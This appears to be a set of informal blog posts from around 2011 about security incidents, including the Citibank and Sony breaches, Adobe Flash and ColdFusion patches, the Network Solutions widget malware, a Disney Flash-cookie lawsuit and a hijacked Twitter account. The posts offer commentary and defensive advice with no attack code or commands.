Citibank was just hacked and hundreds of thousands of customer accounts were exposed. Of their 21 million credit and debit card holders, one per cent, or approximately 210,000 accounts had their details stolen in this breach of security. Give or take.

Which sounds bad.

And is … to an extent.

But it could have been much worse. The damage done from the security violation was mitigated greatly by Citibank’s good security practices.

First, the unauthorized access to Citi’s Account Online was discovered during routine monitoring. Already a good start, that the access is monitored. The next mitigating factor, only 1% of accounts were exposed. Even better. Further, Citibank is contacting customers whose information was impacted. Good. Citi has already implemented enhanced procedures to prevent a recurrence of this type of event. Great! But best of all? THE most important mitigating factor? Only names, email addresses, contact information, and account numbers were exposed. Birth dates, PINs, SSNs, card expiration dates, card CVV security codes, and the likes of the truly sensitive part of the account details were NOT compromised because THAT information was held on a separate and even more secure server.

(Sony, are you listening?!)

That is how security should be done.

Because, let’s face it, hacks will happen. Security will be breached. It’s not a matter of if, it’s a matter of when, how often, and how bad is it. Good security to prevent being hacked is a great start. But just as important are good policies and practices to mitigate the damage when the inevitable happens. Hackers are determined souls, and let’s face it, computers, having been created by humanity, are just as fallible in hardware and software as we fleshy creatures ourselves are. We might like to pretend otherwise, but nobody is perfect, including the folks who wrote your bestest-of-the-best grade-A number-one security software. We all make mistakes. But we don’t have to all pay through the nose for them if we take security seriously.

Well, it looks like yet another Sony website has been hacked as the “Sownage” campaign continues. This time it was Sony’s Brazilian music website that was taken down temporarily to clean up a defacement. Which makes this Hackers 11, Sony 0.

You’d really think that Sony would be doing more to improve their security right now…

Adobe has released an update to its Flash Player that fixes a cross-site scripting vulnerability across all platforms (Windows, Linux, Macintosh, Solaris, and even Android), which is really not much of a surprise as Adobe is full of security holes and often used as an attack vector. Time to update, yet again. Vuln ident APSB11-13 is, according to Adobe, spotted being used in the great wilds of the interwebs through malicious links sent to you through email, so you really should update right away.

Adobe has only patched Flash, and only on real computers. The Android patch for Flash will come sometime this week.

Adobe claims to not have seen attacks targeting the Adobe Reader or Adobe Acrobat products (hence why they only updated Flash) but that doesn’t mean that these products aren’t also vulnerable to the same (or a related) security hole. Just that Adobe hasn’t gotten any proof that they’re being exploited in the same fashion as Flash in this case.

Blah blah blah. When it comes to Adobe, we’ve heard it all before. The specific vuln may be different, but it’s still the same old tune on a permanent loop, which is why it is critical to keep your Adobe products updated regularly.

What IS news however is that this Adobe rushed this update out on Sunday. Their staff must have been burning the weekend oil. But as Adobe themselves even list their latest Flash patch as merely “important” and not “critical”, one has to ask: Why?

Could Sony’s current woes have put everyone on heightened security?

Well, whatever the case, CVE-2011-2107 is worth checking out. Update now, while supplies last. 

Oh, and as always, don’t open stuff from emails that you aren’t sure of!

For those of you who even care at this point, Sony has been hacked, yet again. The parts that are of no surprise whatsoever is that it was a simple SQL injection vulnerability that breached their security, that it was done by LulzSec, and that it wasn’t the PSN: it was the Sony Pictures website.

What is a surprise however is that in the over 1 million user accounts exposed by the hack, not a single password was hashed. They were ALL stored as plain text. Which, really, is incredibly bad security and especially for Sony, by this point, a horrible disgrace. So if you’re a Sony Pictures website user, well, sorry.

Sony has failed you.

In multiple ways.

Again.

If you think surfing the internet is a scary thing to do, what with so many malicious websites out there ready to infect your computer (or smartphone) then try being a website owner.

Network Solutions, Happily Providing Website Owners With Malware Since…

Take, for example, anyone running a website hosted by Network Solutions.  Turns out that one of their widgets, there to make your website construction easier, was actually infected with malware!

What’s worse, Network Solutions is neither apologizing for infecting your websites, nor even saying how their widget got infected in the first place.  They just tell you to delete it.  Oh.  How informative.  How helpful.

Initial reports based on Google and Yahoo searches estimate anywhere between half a million and five million domains may have been infected.  Network Solutions, of course, denies any such numbers as being so high, but as of yet has failed to provide its own numbers to back that up.

SQL Vs. Apple … And A Whole Lot Of Others

An SQL attack has hit approximately half a million legitimate webpages with database commands that attempt to hide malware exploit links into the webpage code.  Of those infected is included the ever famous Apple, who’s iTunes podcast promotion pages were identified as hit.  Fortunately Apple was quick to clean up their infections.

Plenty of other websites have been hacked by this SQL vuln as well, obviously.  The continued SQL database injection attacks are frequently changing enough that tjey jave yet to be stopped.

Adobe – Chilly Towards A Hot ColdFusion Vuln

Adobe’s ColdFusion application server saw a recent update to patch a security hole that it labeled as “important”. But just how important was patching this exploit?  Well a number of researchers now claim that it should have been labeled “critical” because the vuln could actually let hackers seize control of servers in a “full system compromise”.  It not only allows someone to manipulate the system files, but to also upload scripts and even mess around with the database natively.  As holes go, it really doesn’t get worse than that.

Fortunately, Adobe did patch the hole.  But downplaying the importance of the vulnerability may lead to less people upgrading to the fix as they should.

Disney – Sued For Spying On Your Kids?

Walt Disney’s internet subsidiary, Walt Disney Internet Group, and several partners such as Clearspring Technologies and Warner Bros. Records, are being sued in the US District Court of Los Angeles for allegedly using Adobe Flash Player cookies to track highly personal information about users, the majority of whom are minors.  The Locally Shared Objects (LSOs) otherwise known as Flash Cookies, have supposedly been gathering detailed user information over long periods of time since at least 2007, in ways that, are claimed, violate the sites’ privacy policies.   These LSOs were left behind, and used to respawn deleted browser cookies, becoming “zombie cookies” which allegedly were used to re-identify users to continue tracking them without warning or knowledge thereof.

False rumors have been spread that an upcoming European tour of Guns N’ Roses was canned, thanks to a bit of Twitter hacking of Axl Rose’s account.  The tweet from Axl that all was over was, of course, not really from Axl at all.  And he might have even been able to catch it and prevent the spread, had he ever been using his Twitter account instead of, well, doing anything more entertaining than tweeting.  But, alas, he actually has a life.  And so the hack went uncontested long enough for people to believe it.  It’s nice to see someone on Twitter actually busy with real life for a change.  But it’s also a good reminder that if you choose to have an online presence, maybe you should at least log in every once in a while.  Or just let it drop entirely if you’re too busy to take it seriously.